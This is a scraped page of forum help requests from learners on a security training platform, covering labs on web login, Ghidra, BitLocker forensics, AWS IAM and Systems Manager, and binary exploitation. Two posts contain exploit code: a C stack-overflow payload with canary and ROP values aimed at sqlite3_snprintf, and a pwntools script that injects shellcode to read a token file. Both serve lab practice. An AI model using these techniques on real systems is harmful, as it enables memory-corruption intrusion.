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Derrick's Doughnut Admin
In the Intro to Web App Hacking: Mapping Web Applications course, the last step I'm instructed to: Return to the /login page and log in as the admin of the site. What is the token you receive? is the site and I've searched a lot but can't find the Admin credentials. Please advise.0likes0CommentsFoundational Static Analysis: API Analysis
Hi all, I'm stuck in this part, where using Ghidra, I have to find where the Windows API GetModuleHandleA is used, in the binary called exercise_two.exe, and once located, find the parameter of this function. Taking a look about GetModuleHandleA, there's no references or calls to API in any part of the code. Also tried to look for references to GetProcAddress or LoadLibrary and nothing. Am doing something wrong? Any idea to find the "parameter" of the function that calls to the API?. Is the only question from this part remaining... Thanks and regards.2likes0CommentsDigital Forensics: BitLocker Encrypted Drive
I have correctly calculated the offset and have no trouble using the bdemount command however I would appreciate some help with troubleshooting the error recieved when using the mount command. All my commands executed in the lab so far ThanksSolved1like13Comments[AWS]IAM: Tagging
Hello everyone. I'm stuck on Q3 of this lab. I'm leaving the ec2-custom-read policy as: { "Statement": [ { "Action": [ "ec2:GetTransitGateway*" ], "Effect": "Allow", "Resource": "*", "Condition": { "ForAllValues:StringEquals": { "aws:TagKeys": [ "automation" ] } }, "Sid": "ReadEC2TransitGateways" } ], "Version": "2012-10-17" } But if I try to save the policy, it gives me an error: Access denied to iam:CreatePolicyVersion You don't have permission to iam:CreatePolicyVersion Any hints on what I'm missing here? I think I didnt understand what exactly the exercise is asking for here. Regards,Solved2likes2CommentsHuman Connection Challenge: Season 1 – Windows
After the other Human Connection Challenges, I'm now completely stuck on Machine 1 of the Human Connection Challenge: Season 1 – Windows lab. I found the obvious hidden credentials the the: But I can't find anything on the Any hints?Solved1like10CommentsSystems Manager: Automation
Hello, On exercise 4 (Create playbook) I'm getting an error if I configure Step One according the instruction, and I can't proceed with the playbook creation. "AccessDeniedException: User: {{user}} is not authorized to perform: ssm:CreateDocument on resource: {{resource}}/NewRunbook because no permissions boundary allows the ssm:CreateDocument action" This is how I structured the code: schemaVersion: '0.3' assumeRole: {{according the instructions}} description: EC2-Stop-Prod-EU-WEST-1 mainSteps: - name: Pause action: aws:pause nextStep: Approve isEnd: false inputs: {} - name: Approve action: aws:approve nextStep: get_instance_ids isEnd: false inputs: Approvers: - {{according the instructions}} - name: get_instance_ids action: aws:executeAwsApi nextStep: turn_off_prod_instances isEnd: false inputs: Api: DescribeInstances Service: ec2 Filters: - Name: tag-key Values: - prod - Name: instance-state-name Values: - running outputs: - Name: InstanceIds Selector: $.Reservations..Instances..InstanceId Type: StringList - name: turn_off_prod_instances action: aws:executeScript isEnd: true inputs: Runtime: python3.8 Handler: script_handler Script: |- def script_handler(events,context): import boto3 #Initialize client ec2 = boto3.client('ec2') instanceList = events['InstanceIds'] for instance in instanceList: ec2.stop_instances(InstanceIds=[instance]) InputPayload: InstanceIds: '{{get_instance_ids.InstanceIds}}' Does anyone had the same error while doing this lab? Regards,Solved3likes2CommentsLinux Stack Overflow Ep.6
I am having trouble figuring how this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causing a segmentation fault. #include <assert.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <sqlite3.h> #define RETADDR_OFFSET 0 #define CANARY_OFFSET 0x40 #define BUF_OFFSET 0x88 #define CANARY 0xbaadd00dbaadd00dull #define ROPGADGET 0xdeadbeefdeadbeefull #define NGADGETS 1 struct payload { uint8_t padding1[BUF_OFFSET-CANARY_OFFSET]; uint64_t canary; uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8]; uint64_t ropchain[NGADGETS]; }__attribute__((packed, aligned(1))); int main(int argc, char *argv[]) { char dst[256]; struct payload p; memset(p.padding1, 'a', sizeof(p.padding1)); p.canary = CANARY; memset(p.padding2, 'b', sizeof(p.padding2)); p.ropchain[0] = ROPGADGET; size_t target_n = 0x80000000; assert(sizeof(p) + 3 <= target_n); size_t n = target_n - sizeof(p) - 3; size_t target_i = 0x100000000 + (sizeof(p) / 2); char *src = calloc(1, target_i); if (!src) { printf("bad allocation\n"); return -1; } size_t cur = 0; memcpy(src, &p, sizeof(p)); cur += sizeof(p); memset(src+cur, '\'', n/2); cur += n/2; assert(cur < 0x7ffffffeul); memset(src+cur, 'c', 0x7ffffffeul-cur); cur += 0x7ffffffeul-cur; src[cur] = '\xc0'; cur++; memset(src+cur, '\x80', target_i - cur); cur = target_i; src[cur-1] = '\0'; sqlite3_snprintf((int) 256, dst, "'%!q'", src); free(src); return 0; }1like1CommentEC2: Demonstrate Your Skills
Hello everyone, Q9 (Once your load balancer is active, visit the website via its DNS name. What is the token from the webpage?) from EC2: Demonstrate Your Skills is giving an incorrect answer, tough all previous questions are marked green and I'm filling with the exact output from the page (a six digits number). Anyone with the same error?Solved0likes4CommentsNeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)